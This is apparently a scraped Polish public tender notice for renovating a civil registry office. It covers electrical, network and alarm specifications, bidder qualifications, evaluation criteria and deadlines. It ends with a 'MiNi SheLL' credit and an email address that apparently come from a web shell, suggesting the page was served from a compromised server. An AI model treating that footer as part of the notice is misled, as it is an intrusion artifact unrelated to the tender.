USC należy zasilić przewodem YDY5x6 z rozdzielni kotłowni (piwnica). W tym celu w rozdzielni kotłowni należy zabudować wyłącznik S 303 B 32 A. jako zabezpieczenie wewnętrznej linii - zasilanie R USC. Rozdzielnię wykonać i wyposażyć zgodnie z załączonym schematem (rozdzielnia wnękowa typy Legrand, Moller lub podobne)
OŚWIETLENIE
Oświetlenie pomieszczeń zaprojektowano w oparciu o oprawy firmy Kanlux (lub stosować równoważne). Oprawy rozmieścić zgodnie z planem instalacji rys. nr 1. W sali ślubów typy opraw uzgodnić na etapie wykonawstwa z inspektorem. Zasilanie opraw YDYp 3x1,5, żyrandoli YDYp 4x1,5.
INSTALACJA GNIAZD 230V
Instalację gniazd zaprojektowano przewodem YDY 750 3x 2,5 mm2. Wszystkie gniazda muszą być wyposażone w bolec ochronny PE. Instalację gniazd prowadzić w posadzce w wężach karbowanych. Dla zasilania komputerów należy zabudować gniazda typy DATA z kluczem. Rozmieszczenie gniazd zgodnie z planem instalacji.
ZASILANIE KLIMATYZATORA, PODGRZEWACZA WODY, WINDY
Zasilanie podgrzewacza wody i klimatyzatora należy wykonać przewodem YDY 3x4, windy YDY 5x2,5.
INSTALACJA KOMPUTEROWA I ALARMOWA
Instalację komputerową należy wykonać przewodem UTP kat. 6. Przewody instalacji należy prowadzić w uprzednio zamontowanych listwach LN i turach karbowanych. Przewody należy wprowadzić do szafki teleinformatycznej urzędu. Gniazda komputerowe RJ 45 (podwójne) w puszkach podtynkowych. Od listwy do puszek przewody prowadzić w rurkach karbowanych. Zaprojektowano 4 gniazda podwójne- podłączenie komputerów i telefonów. Instalacja alarmowa obejmuje pomieszczenia sali ślubów, biura, archiwum i holu. Przewody instalacji YTDY 6x0,5 w USC należy układać w pod tynkiem i w listwach. Przewody należy wprowadzić do istniejącej centralki alarmowej urzędu. Plany instalacji rys nr 1 i 2.
NAGŁOŚNIENIE SALI ŚLUBÓW
Nagłośnienie uzgodnić na etapie wykonawstwa z inwestorem. W kosztorysie założono zestaw dwa mikrofony bezprzewodowe, odtwarzacz, wzmacniacz i głośniki.
OCHRANA PRZECIWPORAŻENIOWA
Dla ochrony przed porażeniem zaprojektowano wyłączniki różnicowo- prądowe o prądzie l 30 mA dla obwodów gniazd, zasilania klimatyzatora, podgrzewacza wody i windy. Pozostałe obwody wyłączniki nadmiarowo- prądowe (szybkie wyłączenie).
TECHNOLOGIA WYKONANIA INSTALACJI
Instalację należy wykonać jako podtynkową w listwach, rurkach (wężach karbowanych). Część instalacji należy wykonać przed zalaniem posadzki betonem.
3.4.8. DOSTĘPNOŚĆ DLA OSÓB NIEPEŁNOSPRAWNYCH
Obiekt dostępny dla osób niepełnosprawnych poruszających się na wózkach inwalidzkich. Zaprojektowano platformę pionową przy schodach zewnętrznych. Wysokość progów nie przekracza 2 cm.
Kolorystkę ścian, podłóg, wyposażenia Urzędu Stanu Cywilnego należy uzgodnić 
z Zamawiającym.
3.5. W przypadku użycia w opisie przedmiotu zamówienia nazw własnych oznacza to, że Zamawiający oczekuje zaproponowania rozwiązań o parametrach technicznych (równoważnych), tj. nie gorszych niż parametry jakimi charakteryzuje się materiał, urządzenie, element, wskazany w niniejszej SIWZ.
3.6. Roboty należy wykonać zgodnie Dokumentacją Projektową, Specyfikacjami Technicznymi oraz pozostałymi wymaganiami szczegółowo określonymi w SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>45262700-8<br /><b> Dodatkowe kody CPV:</b>45111100-9,
                45111220-6,
                45262311-4,
                45320000-6,
                45321000-3,
                45432100-5,
                45421000-4,
                45421141-4,
                45223210-1,
                45442100-8,
                45410000-4,
                45260000-7,
                45262120-8,
                45315100-9,
                45210000-2,
                45300000-0,
                45331100-7,
                45321000-3,
                45223210-1,
                45000000-7,
                45300000-0,
                45332200-5,
                45332300-6,
                45331100-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 6<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia w tym zakresie wymagań<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                O uzyskanie zamówienia mogą się ubiegać podmioty, które uzyskały średni roczny obrót w obszarze objętym zamówieniem tj. w zakresie robót budowlanych, za ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy- za ten okres w wysokości co najmniej 200.000,00 zł brutto.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek Wykonawcy muszą spełniać łącznie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O uzyskanie zamówienia mogą ubiegać się podmioty posiadające doświadczenie polegające na wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej jednąrobotę budowlaną polegających na: budowie domu mieszkalnego lub remoncie domu mieszkalnego uwzględniające prace ogólnobudowlane, instalacyjne wodno- kanalizacyjne i elektryczne. Wartość każdej roboty budowlanej nie może być mniejsza niż 200.000,00 zł brutto.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek Wykonawcy muszą spełniać łącznie.
O uzyskanie zamówienia mogą ubiegać się podmioty dysponujące następującymi osobami niezbędnymi do realizacji zamówienia: kierownik budowy posiadający uprawnienia budowlane do kierowania robotami budowalnymi w specjalności konstrukcyjno- budowalnej bez ograniczeń lub równoważne uprawnienia budowlane do kierowania robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wystarczy by powyższy warunek spełniał jeden z Wykonawców.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia o jakich stanowi art. 24 ust. 5 pkt 1 p.z.p. - odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.
Uwaga: W przypadku gdy Wykonawca polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu należy załączyć zobowiązania wymagane postanowieniami pkt 9.2. IDW (Załącznik 3.3).
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) Oświadczenie Wykonawcy o rocznym obrocie Wykonawcy w obszarze objętym zamówieniem, za okres ostatnich 3 obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
b) Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty.
c) Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Treści oświadczeń o jakich mowa w pkt 8.7.1 zostaną przekazane tylko Wykonawcy wzywanemu przez Zamawiającego do ich złożenia. Na etapie ofertowania nie należy składać przedmiotowych dokumentów.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 p.z.p., przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 p.z.p. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówieni (Załącznik 3.4. do SIWZ).</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji zamówienia</td><td>20</td></tr><tr><td>Okres gwarancji</td><td>15</td></tr><tr><td>Termin płatności faktury</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 04/01/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert.
Oświadczenia stanowiące wstępne potwierdzenie, że Wykonawca:
- nie podlega wykluczeniu;
- spełnia warunki udziału w postępowaniu.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com